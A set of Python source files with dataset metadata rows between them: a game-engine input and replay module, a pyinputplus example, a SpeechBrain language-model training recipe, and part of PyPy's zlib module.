Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyReleasedEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \
"canceled=" + str(self._canceled) + "]"
class KeyTypedEvent(KeyEvent):
"""
The type of KeyEvent used for key type event.
    This kind of event is fired whenever a key is being typed. This event will be fired when the key is released only
    if it has been held for a short period of time (see InputHandler to specify the delay).
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key typed.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyTypedEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \
"canceled=" + str(self._canceled) + "]"
class KeyHeldEvent(KeyEvent):
"""
The type of KeyEvent used for key hold event.
    This kind of event is fired whenever a key is being held. This event will be repeated each tick while the key is
    being held. It is always preceded by a KeyPressedEvent and followed by a KeyReleasedEvent of the same key.
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key held.
duration: int
        The number of ticks for which the key has been held.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, key: int, duration: int):
"""
Initializes the KeyHeldEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key held.
duration: int
            The number of ticks for which the key has been held.
"""
KeyEvent.__init__(self, tick, key)
self.duration = duration
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyHeldEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \
"duration=" + str(self.duration) + ", canceled=" + str(self._canceled) + "]"
class MouseEvent(InputEvent):
"""
A generic type of event used for mouse input.
This type of event is used for any event related to the update of the mouse state (either a mouse button or the
    position of the pointer). These events extend from CancelableEvent, hence they can be canceled while being
    processed by the event queue. This can be useful if more than one object interacts with the mouse at once, by giving
priority to one over the others.
Attributes
----------
tick: int
The tick at which the event got fired.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, position: numpy.ndarray):
"""
Initializes the MouseEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
position: numpy.ndarray
The position of the pointer on the screen.
"""
CancelableEvent.__init__(self, tick)
self.position = position
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseEvent[tick=" + str(self.tick) + ", position=" + str(self.position) + ", " + \
"canceled=" + str(self._canceled) + "]"
class MouseMovedEvent(MouseEvent):
"""
The type of MouseEvent used for mouse move event.
This kind of event is fired whenever the mouse is being moved.
Attributes
----------
tick: int
The tick at which the event got fired.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseMovedEvent[tick=" + str(self.tick) + ", position=" + str(self.position) + ", " + \
"canceled=" + str(self._canceled) + "]"
class MouseButtonEvent(MouseEvent):
"""
A generic type of event used for mouse button input.
    This type of event is used for any event related to the update of a mouse button state. These events extend from
    CancelableEvent, hence they can be canceled while being processed by the event queue. This can be useful if more
    than one object interacts with the mouse at once, by giving priority to one over the others.
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button updated (see also MouseButton).
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, button: int, position: numpy.ndarray):
"""
Initializes the MouseButtonEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button updated.
position: numpy.ndarray
The position of the pointer on the screen.
"""
MouseEvent.__init__(self, tick, position)
self.button = button
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]"
class MouseButtonPressedEvent(MouseButtonEvent):
"""
The type of MouseButtonEvent used for mouse button press event.
This kind of event is fired whenever a mouse button is being pressed. Unlike the MouseDraggedEvent, this event is
    only issued once until the mouse button is released.
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button pressed.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonPressedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]"
class MouseButtonReleasedEvent(MouseButtonEvent):
"""
The type of MouseButtonEvent used for mouse button release event.
This kind of event is fired whenever a mouse button is being released. This event can only be fired after a
MouseButtonPressedEvent is issued.
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button released.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonReleasedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]"
class MouseButtonClickedEvent(MouseButtonEvent):
"""
The type of MouseButtonEvent used for mouse button click event.
This kind of event is fired whenever a mouse button is being clicked. This event will be fired when the mouse button
    is released only if it has been held for a short period of time (see InputHandler to specify the delay).
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button clicked.
position: numpy.ndarray
The position of the pointer on the screen.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonClickedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]"
class MouseDraggedEvent(MouseButtonEvent):
"""
The type of MouseButtonEvent used for mouse drag event.
This kind of event is fired whenever a mouse button is being dragged (in other words, when the mouse is being moved
while a mouse button is held). This event will be repeated each tick while the mouse button is being held. It is
    always preceded by a MouseButtonPressedEvent and followed by a MouseButtonReleasedEvent of the same mouse button.
Attributes
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button held.
position: numpy.ndarray
The position of the pointer on the screen.
duration: int
        The number of ticks for which the mouse button has been held.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, button: int, position: numpy.ndarray, duration: int):
"""
Initializes the MouseDraggedEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
button: int
The code of the mouse button held.
position: numpy.ndarray
The position of the pointer on the screen.
duration: int
            The number of ticks for which the mouse button has been held.
"""
MouseButtonEvent.__init__(self, tick, button, position)
self.duration = duration
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "MouseButtonDraggedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \
"duration=" + str(self.duration) + ", position=" + str(self.position) + ", " + \
"canceled=" + str(self._canceled) + "]"
class InputHandler:
"""
The source of any user input.
Any game with user interaction should use an InputHandler.
Attributes
----------
mouse_position: numpy.ndarray
The current position of the mouse pointer on the screen.
Methods
-------
fire_events(tick)
Fires the key and mouse events.
record()
Starts the input recording.
export_record(path)
Exports the record into a replay file.
load_replay(path)
Loads a replay and plays it.
key_press(key_code)
Sets the state of the specified key as pressed.
key_release(key_code)
Sets the state of the specified key as released.
mouse_button_press(mouse_button)
        Sets the state of the specified mouse button as pressed.
mouse_button_release(mouse_button)
Sets the state of the specified mouse button as released.
move_mouse(position)
Sets the position of the mouse pointer.
"""
DEFAULT_DURATION_TYPE = 20
DEFAULT_DURATION_CLICK = 20
def __init__(self, event_queue: EventQueue, duration_type: int = DEFAULT_DURATION_TYPE,
duration_click: int = DEFAULT_DURATION_CLICK):
"""
Initializes the InputHandler.
Parameters
----------
event_queue: EventQueue
The main event queue used to handle the events.
duration_type: int, optional
            The threshold, expressed in ticks, at or below which a key hold is considered a key type.
duration_click: int, optional
            The threshold, expressed in ticks, below which a mouse button hold is considered a click.
"""
self._event_queue = event_queue
self._duration_type = duration_type
self._duration_click = duration_click
self._key_durations = {}
self._mouse_button_durations = {}
self.mouse_position = numpy.array((0, 0), dtype=int)
self._mouse_previous_position = numpy.array((0, 0), dtype=int)
self._recorder = None
self._replay = None
self._should_record = False
def key_press(self, key_code: int) -> None:
"""
Sets the state of the specified key as pressed.
Makes the InputHandler consider the specified key as pressed until another function to release the key is
called.
Parameters
----------
key_code: int
The code of the key pressed.
"""
if key_code not in self._key_durations:
self._key_durations[key_code] = [0, False]
def key_release(self, key_code: int) -> None:
"""
Sets the state of the specified key as released.
Makes the InputHandler consider the specified key as released until another function to press the key is called.
Parameters
----------
key_code: int
The code of the key released.
"""
if key_code in self._key_durations:
self._key_durations[key_code][1] = True
def mouse_button_press(self, mouse_button: int) -> None:
"""
Sets the state of the specified mouse button as pressed.
Makes the InputHandler consider the specified mouse button as pressed until another function to release the
button is called.
Parameters
----------
mouse_button: int
The code of the mouse button pressed.
"""
if mouse_button not in self._mouse_button_durations:
self._mouse_button_durations[mouse_button] = [0, False]
def mouse_button_release(self, mouse_button: int) -> None:
"""
Sets the state of the specified mouse button as released.
Makes the InputHandler consider the specified mouse button as released until another function to press the
button is called.
Parameters
----------
mouse_button: int
The code of the mouse button released.
"""
if mouse_button in self._mouse_button_durations:
self._mouse_button_durations[mouse_button][1] = True
def move_mouse(self, position: numpy.ndarray) -> None:
"""
Sets the position of the mouse pointer.
Parameters
----------
position: numpy.ndarray
The current position of the mouse pointer on the screen.
"""
self.mouse_position = position
def record(self) -> None:
"""
Starts the input recording.
"""
self._should_record = True
def export_record(self, path) -> None:
"""
Exports the record into a replay file.
Parameters
----------
path: str
The path to the replay file.
"""
with open(path, "w") as file:
json.dump(self._recorder.inputs, file)
def load_replay(self, path, replay_tick: int = 0) -> None:
"""
Loads a replay and plays it.
Parameters
----------
path: str
The path to the replay file.
replay_tick: int
The local tick reference of the replay.
"""
with open(path, "r") as file:
inputs = json.load(file)
self._replay = InputReplay(inputs, replay_tick=replay_tick)
def fire_events(self, tick: int) -> None:
"""
Fires the key and mouse events.
This function creates every event related to key and mouse inputs and queues them in the main event queue. It
should be called at every tick, each time the logic is done.
Parameters
----------
tick: int
The current logic tick.
"""
if self._replay is not None:
self._replay.play(tick, self)
if self._should_record:
self._recorder = InputRecorder(tick)
self._should_record = False
for key in list(self._key_durations.keys()):
if self._key_durations[key][1]:
self._event_queue.fire_event(KeyReleasedEvent(tick, key))
if self._recorder is not None:
self._recorder.key_release(tick, key)
if self._key_durations[key][0] <= self._duration_type:
self._event_queue.fire_event(KeyTypedEvent(tick, key))
del self._key_durations[key]
else:
if self._key_durations[key][0] == 0:
self._event_queue.fire_event(KeyPressedEvent(tick, key))
if self._recorder is not None:
self._recorder.key_press(tick, key)
else:
self._event_queue.fire_event(KeyHeldEvent(tick, key, self._key_durations[key][0]))
self._key_durations[key][0] += 1
for mouse_button in list(self._mouse_button_durations.keys()):
if self._mouse_button_durations[mouse_button][1]:
self._event_queue.fire_event(MouseButtonReleasedEvent(tick, mouse_button, self.mouse_position))
if self._recorder is not None:
self._recorder.mouse_button_release(tick, mouse_button)
if self._mouse_button_durations[mouse_button][0] < self._duration_click:
self._event_queue.fire_event(MouseButtonClickedEvent(tick, mouse_button, self.mouse_position))
del self._mouse_button_durations[mouse_button]
else:
if self._mouse_button_durations[mouse_button][0] == 0:
self._event_queue.fire_event(MouseButtonPressedEvent(tick, mouse_button, self.mouse_position))
if self._recorder is not None:
self._recorder.mouse_button_press(tick, mouse_button)
elif not numpy.array_equal(self.mouse_position, self._mouse_previous_position):
self._event_queue.fire_event(MouseDraggedEvent(
tick, mouse_button, self.mouse_position, self._mouse_button_durations[mouse_button][0]
))
self._mouse_button_durations[mouse_button][0] += 1
if not numpy.array_equal(self.mouse_position, self._mouse_previous_position):
self._event_queue.fire_event(MouseMovedEvent(tick, self.mouse_position))
if self._recorder is not None:
self._recorder.move_mouse(tick, self.mouse_position)
self._mouse_previous_position = self.mouse_position
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "InputHandler[mouse_position=" + str(self.mouse_position) + "]"
class InputReplay:
"""
A simple way of queueing a sequence of inputs.
Methods
-------
play(tick, input_handler)
Plays the actions of the replay of the specified tick.
"""
EVENT_KEY_PRESS = 0
EVENT_KEY_RELEASE = 1
EVENT_MOUSE_BUTTON_PRESS = 2
EVENT_MOUSE_BUTTON_RELEASE = 3
EVENT_MOUSE_MOVE = 4
def __init__(self, inputs: dict, replay_tick: int = 0):
"""
Initializes the InputReplay.
Parameters
----------
inputs: dict
The input events with the tick at which they will be issued.
replay_tick: int, optional
The local reference tick.
"""
self._inputs = inputs
self._tick = replay_tick
def play(self, tick: int, input_handler: InputHandler) -> None:
"""
Plays the actions of the replay of the specified tick.
Parameters
----------
tick: int
The current logic tick.
input_handler: InputHandler
The main input handler controlled by the replay.
"""
local_tick = str(tick - self._tick)
if local_tick in self._inputs:
events = self._inputs[local_tick]
for event in events:
if event[0] == InputReplay.EVENT_KEY_PRESS:
input_handler.key_press(key_code=event[1])
elif event[0] == InputReplay.EVENT_KEY_RELEASE:
input_handler.key_release(key_code=event[1])
elif event[0] == InputReplay.EVENT_MOUSE_BUTTON_PRESS:
input_handler.mouse_button_press(mouse_button=event[1])
elif event[0] == InputReplay.EVENT_MOUSE_BUTTON_RELEASE:
input_handler.mouse_button_release(mouse_button=event[1])
elif event[0] == InputReplay.EVENT_MOUSE_MOVE:
                    input_handler.move_mouse(position=numpy.array(event[1]))
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "InputReplay[tick=" + str(self._tick) + "]"
class InputRecorder:
"""
A simple way of recording user inputs.
When a record is started, it will register the inputs from the user.
Attributes
----------
inputs: dict
The input events with the tick at which they were issued.
Methods
-------
key_press(tick, key_code)
Adds a key press input to the record.
key_release(tick, key_code)
Adds a key release input to the record.
mouse_button_press(tick, mouse_button)
Adds a mouse button press input to the record.
mouse_button_release(tick, mouse_button)
Adds a mouse button release input to the record.
move_mouse(tick, position)
Adds a mouse move input to the record.
get_replay(replay_tick)
        Creates a replay based on the record.
"""
def __init__(self, record_tick: int = 0):
"""
Initializes the InputRecorder.
Parameters
----------
record_tick: int, optional
The local reference tick.
"""
self._record_tick = record_tick
self.inputs = {}
def _input(self, tick, event_type: int, value: any) -> None:
"""
Adds a new input to the record.
Parameters
----------
tick: int
The tick at which the input was issued.
event_type: int
The type of input.
value: any
The event data.
"""
        # InputReplay.play looks up ticks as string keys (the form they take
        # after a JSON round trip), so they are stored as strings here too.
        local_tick = str(tick - self._record_tick)
if local_tick not in self.inputs:
self.inputs[local_tick] = []
self.inputs[local_tick].append([event_type, value])
def key_press(self, tick: int, key_code: int) -> None:
"""
Adds a key press input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
key_code: int
The code of the key pressed.
"""
self._input(tick, InputReplay.EVENT_KEY_PRESS, key_code)
def key_release(self, tick: int, key_code: int) -> None:
"""
Adds a key release input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
key_code: int
The code of the key released.
"""
self._input(tick, InputReplay.EVENT_KEY_RELEASE, key_code)
def mouse_button_press(self, tick: int, mouse_button: int) -> None:
"""
Adds a mouse button press input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
mouse_button: int
The code of the mouse button pressed.
"""
self._input(tick, InputReplay.EVENT_MOUSE_BUTTON_PRESS, mouse_button)
def mouse_button_release(self, tick: int, mouse_button: int) -> None:
"""
Adds a mouse button release input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
mouse_button: int
The code of the mouse button released.
"""
self._input(tick, InputReplay.EVENT_MOUSE_BUTTON_RELEASE, mouse_button)
def move_mouse(self, tick: int, position: numpy.ndarray) -> None:
"""
Adds a mouse move input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
position: numpy.ndarray
The current position of the mouse pointer on the screen.
"""
self._input(tick, InputReplay.EVENT_MOUSE_MOVE, tuple(position))
def get_replay(self, replay_tick: int = 0) -> InputReplay:
"""
        Creates a replay based on the record.
Parameters
----------
replay_tick: int
The local tick reference of the replay.
Returns
-------
replay: InputReplay
The replay associated to the record.
"""
return InputReplay(self.inputs, replay_tick)
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "InputRecorder[tick=" + str(self._record_tick) + "]"
| 27.955585 | 120 | 0.593902 |
6bd69aefb8753456fe6243ada8bcc8b569036450 | 912 | py | Python | main/strings/validation/input_plus.py | catalinprescure/python-pages | 93df3b22df2cfa269127e803a1b6c6a34bae6745 | [
"MIT"
] | null | null | null | main/strings/validation/input_plus.py | catalinprescure/python-pages | 93df3b22df2cfa269127e803a1b6c6a34bae6745 | [
"MIT"
] | null | null | null | main/strings/validation/input_plus.py | catalinprescure/python-pages | 93df3b22df2cfa269127e803a1b6c6a34bae6745 | [
"MIT"
] | 1 | 2021-12-24T15:58:32.000Z | 2021-12-24T15:58:32.000Z | """Pyinputplus
Contains functions similar to input() for other kinds of data:
number, date, email, address
Pyinputplus is not part of the standard distribution.
pip install pyinputplus
Import as pyip save us from typing pyinputplus every time.
"""
import pyinputplus as pyip
response = pyip.inputNum('What is your age? ', min=10, limit=4)
print(f'Your age is: {response}')
# What is your age? 6
# Number must be at minimum 10.
# What is your age? -10
# Number must be at minimum 10.
# What is your age? abc
# 'abc' is not a number.
# What is your age? 5
# Exception: pyinputplus.RetryLimitException
response = pyip.inputMenu(['dog', 'cat', 'horse'], lettered=True,
prompt='What is your favorite animal? \n'
)
print(f'Your favorite animal is: {response}')
# What is your favorite animal?
# A. dog
# B. cat
# C. horse
# b
# Your favorite animal is: cat | 30.4 | 65 | 0.674342 |
cb666a17551be48cc70883bb60cccf0da07f315b | 6,988 | py | Python | recipes/LibriSpeech/LM/train.py | anonymspeechbrain/speechbrain | 9a0632ddb066f5bceffb71fb971552fb542f7b7e | [
"Apache-2.0"
] | null | null | null | recipes/LibriSpeech/LM/train.py | anonymspeechbrain/speechbrain | 9a0632ddb066f5bceffb71fb971552fb542f7b7e | [
"Apache-2.0"
] | null | null | null | recipes/LibriSpeech/LM/train.py | anonymspeechbrain/speechbrain | 9a0632ddb066f5bceffb71fb971552fb542f7b7e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""Recipe for training a Language Model with librispeech train-960 transcript and lm_corpus.
To run this recipe, do the following:
> pip install datasets
> python train.py hparams/<hparam_file>.yaml --data_folder <local_path_to_librispeech_dataset>
Authors
* Anonymous
"""
import os
import sys
import logging
import glob
import torch
from datasets import load_dataset
from hyperpyyaml import load_hyperpyyaml
import speechbrain as sb
from speechbrain.utils.distributed import run_on_main
logger = logging.getLogger(__name__)
# Define training procedure
class LM(sb.core.Brain):
def compute_forward(self, batch, stage):
"""Forward computations from the sentence batches to the output probabilities."""
batch = batch.to(self.device)
tokens_bos, _ = batch.tokens_bos
logits = self.hparams.model(tokens_bos)
pred = self.hparams.log_softmax(logits)
return pred
def compute_objectives(self, predictions, batch, stage):
"""Computes the loss given predictions and targets."""
batch = batch.to(self.device)
tokens_eos, tokens_len = batch.tokens_eos
loss = self.hparams.compute_cost(
predictions, tokens_eos, length=tokens_len
)
return loss
def fit_batch(self, batch):
"""Train the parameters given a single batch in input"""
predictions = self.compute_forward(batch, sb.Stage.TRAIN)
loss = self.compute_objectives(predictions, batch, sb.Stage.TRAIN)
(loss / self.hparams.accu_steps).backward()
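        # With accu_steps = N the loss of each batch is scaled by 1/N and its
        # gradients are accumulated over N consecutive batches, so the single
        # optimizer step below effectively sees a batch N times larger.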
if self.step % self.hparams.accu_steps == 0:
            # gradient clipping & early stop if the loss is not finite
self.check_gradients(loss)
self.optimizer.step()
self.optimizer.zero_grad()
if isinstance(
self.hparams.lr_annealing, sb.nnet.schedulers.NoamScheduler
) or isinstance(
self.hparams.lr_annealing,
sb.nnet.schedulers.CyclicCosineScheduler,
):
self.hparams.lr_annealing(self.optimizer)
return loss
def on_stage_end(self, stage, stage_loss, epoch):
"""Gets called at the end of a epoch."""
stage_stats = {"loss": stage_loss}
if stage == sb.Stage.TRAIN:
self.train_stats = stage_stats
if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
if not (
isinstance(
self.hparams.lr_annealing, sb.nnet.schedulers.NoamScheduler
)
or isinstance(
self.hparams.lr_annealing,
sb.nnet.schedulers.CyclicCosineScheduler,
)
):
old_lr, new_lr = self.hparams.lr_annealing(stage_loss)
sb.nnet.schedulers.update_learning_rate(self.optimizer, new_lr)
else:
old_lr = self.hparams.lr_annealing.current_lr
self.hparams.train_logger.log_stats(
stats_meta={"epoch": epoch, "lr": old_lr},
train_stats=self.train_stats,
valid_stats=stage_stats,
)
self.checkpointer.save_and_keep_only(
meta=stage_stats, min_keys=["loss"],
)
def dataio_prepare(hparams):
"""grap all the .txt files for transcripts"""
logging.info("generating datasets...")
data_folder = hparams["data_folder"]
train_transcripts = glob.glob(
os.path.join(data_folder, "train*/**/*.trans.txt"), recursive=True
)
dev_transcripts = glob.glob(
os.path.join(data_folder, "dev*/**/*.trans.txt"), recursive=True
)
test_transcripts = glob.glob(
os.path.join(data_folder, "test*/**/*.trans.txt"), recursive=True
)
"""prepare data and generate datasets"""
datasets = load_dataset(
"dataset.py",
lm_corpus_path=hparams["lm_corpus_path"],
data_files={
"train": train_transcripts,
"dev": dev_transcripts,
"test": test_transcripts,
},
)
train_data, valid_data, test_data = (
datasets["train"],
datasets["dev"],
datasets["test"],
)
"""convert huggingface's dataset to DynamicItemDataset via a magical function"""
train_data = sb.dataio.dataset.DynamicItemDataset.from_arrow_dataset(
train_data
)
valid_data = sb.dataio.dataset.DynamicItemDataset.from_arrow_dataset(
valid_data
)
test_data = sb.dataio.dataset.DynamicItemDataset.from_arrow_dataset(
test_data
)
datasets = [train_data, valid_data, test_data]
tokenizer = hparams["tokenizer"]
"""Define text pipeline"""
# TODO: implement text augmentations pipelines
@sb.utils.data_pipeline.takes("text")
@sb.utils.data_pipeline.provides("text", "tokens_bos", "tokens_eos")
def text_pipeline(text):
yield text
tokens_list = tokenizer.encode_as_ids(text)
tokens_bos = torch.LongTensor([hparams["bos_index"]] + (tokens_list))
yield tokens_bos
tokens_eos = torch.LongTensor(tokens_list + [hparams["eos_index"]])
yield tokens_eos
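    # For example, a sample whose "text" is "HELLO WORLD" and whose (purely
    # hypothetical) tokenizer ids are [17, 42] would yield
    # tokens_bos = [bos_index, 17, 42] and tokens_eos = [17, 42, eos_index].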
sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline)
# 4. Set output:
sb.dataio.dataset.set_output_keys(
datasets, ["id", "text", "tokens_bos", "tokens_eos"],
)
return train_data, valid_data, test_data
if __name__ == "__main__":
# CLI:
hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])
with open(hparams_file) as fin:
hparams = load_hyperpyyaml(fin, overrides)
# If distributed_launch=True then
# create ddp_group with the right communication protocol
sb.utils.distributed.ddp_init_group(run_opts)
# Create experiment directory
sb.create_experiment_directory(
experiment_directory=hparams["output_folder"],
hyperparams_to_save=hparams_file,
overrides=overrides,
)
# here we create the dataloader objects as well as tokenization and encoding
train_data, valid_data, test_data = dataio_prepare(hparams)
# We download the tokenizer from HuggingFace (or elsewhere depending on
# the path given in the YAML file).
run_on_main(hparams["pretrainer"].collect_files)
hparams["pretrainer"].load_collected(device=run_opts["device"])
lm_brain = LM(
modules=hparams["modules"],
opt_class=hparams["optimizer"],
hparams=hparams,
run_opts=run_opts,
checkpointer=hparams["checkpointer"],
)
lm_brain.fit(
lm_brain.hparams.epoch_counter,
train_data,
valid_data,
train_loader_kwargs=hparams["train_dataloader_opts"],
valid_loader_kwargs=hparams["valid_dataloader_opts"],
)
# evaluation
test_stats = lm_brain.evaluate(
test_data,
min_key="loss",
test_loader_kwargs=hparams["test_dataloader_opts"],
)
| 32.807512 | 94 | 0.647825 |
2dbf49c3c682c3a675a48c9aad656349ff7f2784 | 12,478 | py | Python | pypy/module/zlib/interp_zlib.py | microvm/pypy-mu | 6b03fbe93052d0eb3a4c67152c987c16837b3484 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/module/zlib/interp_zlib.py | microvm/pypy-mu | 6b03fbe93052d0eb3a4c67152c987c16837b3484 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/module/zlib/interp_zlib.py | microvm/pypy-mu | 6b03fbe93052d0eb3a4c67152c987c16837b3484 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | import sys
from pypy.interpreter.gateway import interp2app, unwrap_spec
from pypy.interpreter.baseobjspace import W_Root
from pypy.interpreter.typedef import TypeDef, interp_attrproperty
from pypy.interpreter.error import OperationError, oefmt
from rpython.rlib.rarithmetic import intmask, r_uint
from rpython.rlib.objectmodel import keepalive_until_here
from rpython.rlib import rzlib
if intmask(2**31) == -2**31:
# 32-bit platforms
unsigned_to_signed_32bit = intmask
else:
# 64-bit platforms
def unsigned_to_signed_32bit(x):
# assumes that 'x' is in range(0, 2**32) to start with
SIGN_EXTEND2 = 1 << 31
return intmask((x ^ SIGN_EXTEND2) - SIGN_EXTEND2)
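# Worked example of the sign extension above (illustrative):
#   0xFFFFFFFF -> (0xFFFFFFFF ^ 2**31) - 2**31 = 0x7FFFFFFF - 0x80000000 = -1
#   0x7FFFFFFF -> (0x7FFFFFFF ^ 2**31) - 2**31 = 0xFFFFFFFF - 0x80000000 = 2**31 - 1
# so values in range(0, 2**32) are mapped onto range(-2**31, 2**31), matching
# the signed checksums returned by crc32() and adler32() below.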
@unwrap_spec(string='bufferstr', start='truncatedint_w')
def crc32(space, string, start = rzlib.CRC32_DEFAULT_START):
"""
crc32(string[, start]) -- Compute a CRC-32 checksum of string.
An optional starting value can be specified. The returned checksum is
an integer.
"""
ustart = r_uint(start)
checksum = rzlib.crc32(string, ustart)
# This is, perhaps, a little stupid. zlib returns the checksum unsigned.
# CPython exposes it as a signed value, though. -exarkun
# Note that in CPython < 2.6 on 64-bit platforms the result is
# actually unsigned, but it was considered to be a bug so we stick to
# the 2.6 behavior and always return a number in range(-2**31, 2**31).
checksum = unsigned_to_signed_32bit(checksum)
return space.wrap(checksum)
@unwrap_spec(string='bufferstr', start='truncatedint_w')
def adler32(space, string, start=rzlib.ADLER32_DEFAULT_START):
"""
adler32(string[, start]) -- Compute an Adler-32 checksum of string.
An optional starting value can be specified. The returned checksum is
an integer.
"""
ustart = r_uint(start)
checksum = rzlib.adler32(string, ustart)
# See comments in crc32() for the following line
checksum = unsigned_to_signed_32bit(checksum)
return space.wrap(checksum)
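# The optional start argument makes the checksums chainable over data that
# arrives in chunks; at application level (illustrated with CPython's zlib):
#   zlib.crc32(b"world", zlib.crc32(b"hello ")) == zlib.crc32(b"hello world")
# and the same holds for adler32.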
class Cache:
def __init__(self, space):
self.w_error = space.new_exception_class("zlib.error")
def zlib_error(space, msg):
w_error = space.fromcache(Cache).w_error
return OperationError(w_error, space.wrap(msg))
@unwrap_spec(string='bufferstr', level=int)
def compress(space, string, level=rzlib.Z_DEFAULT_COMPRESSION):
"""
compress(string[, level]) -- Returned compressed string.
Optional arg level is the compression level, in 1-9.
"""
try:
try:
stream = rzlib.deflateInit(level)
except ValueError:
raise zlib_error(space, "Bad compression level")
try:
result = rzlib.compress(stream, string, rzlib.Z_FINISH)
finally:
rzlib.deflateEnd(stream)
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
return space.wrap(result)
@unwrap_spec(string='bufferstr', wbits="c_int", bufsize=int)
def decompress(space, string, wbits=rzlib.MAX_WBITS, bufsize=0):
"""
decompress(string[, wbits[, bufsize]]) -- Return decompressed string.
Optional arg wbits is the window buffer size. Optional arg bufsize is
only for compatibility with CPython and is ignored.
"""
try:
try:
stream = rzlib.inflateInit(wbits)
except ValueError:
raise zlib_error(space, "Bad window buffer size")
try:
result, _, _ = rzlib.decompress(stream, string, rzlib.Z_FINISH)
finally:
rzlib.inflateEnd(stream)
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
return space.wrap(result)
class ZLibObject(W_Root):
"""
Common base class for Compress and Decompress.
"""
stream = rzlib.null_stream
def __init__(self, space):
self._lock = space.allocate_lock()
def lock(self):
"""To call before using self.stream."""
self._lock.acquire(True)
def unlock(self):
"""To call after using self.stream."""
self._lock.release()
keepalive_until_here(self)
# subtle: we have to make sure that 'self' is not garbage-collected
# while we are still using 'self.stream' - hence the keepalive.
class Compress(ZLibObject):
"""
Wrapper around zlib's z_stream structure which provides convenient
compression functionality.
"""
def __init__(self, space, level=rzlib.Z_DEFAULT_COMPRESSION,
method=rzlib.Z_DEFLATED, # \
wbits=rzlib.MAX_WBITS, # \ undocumented
memLevel=rzlib.DEF_MEM_LEVEL, # / parameters
strategy=rzlib.Z_DEFAULT_STRATEGY): # /
ZLibObject.__init__(self, space)
try:
self.stream = rzlib.deflateInit(level, method, wbits,
memLevel, strategy)
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
except ValueError:
raise oefmt(space.w_ValueError, "Invalid initialization option")
self.register_finalizer(space)
def _finalize_(self):
"""Automatically free the resources used by the stream."""
if self.stream:
rzlib.deflateEnd(self.stream)
self.stream = rzlib.null_stream
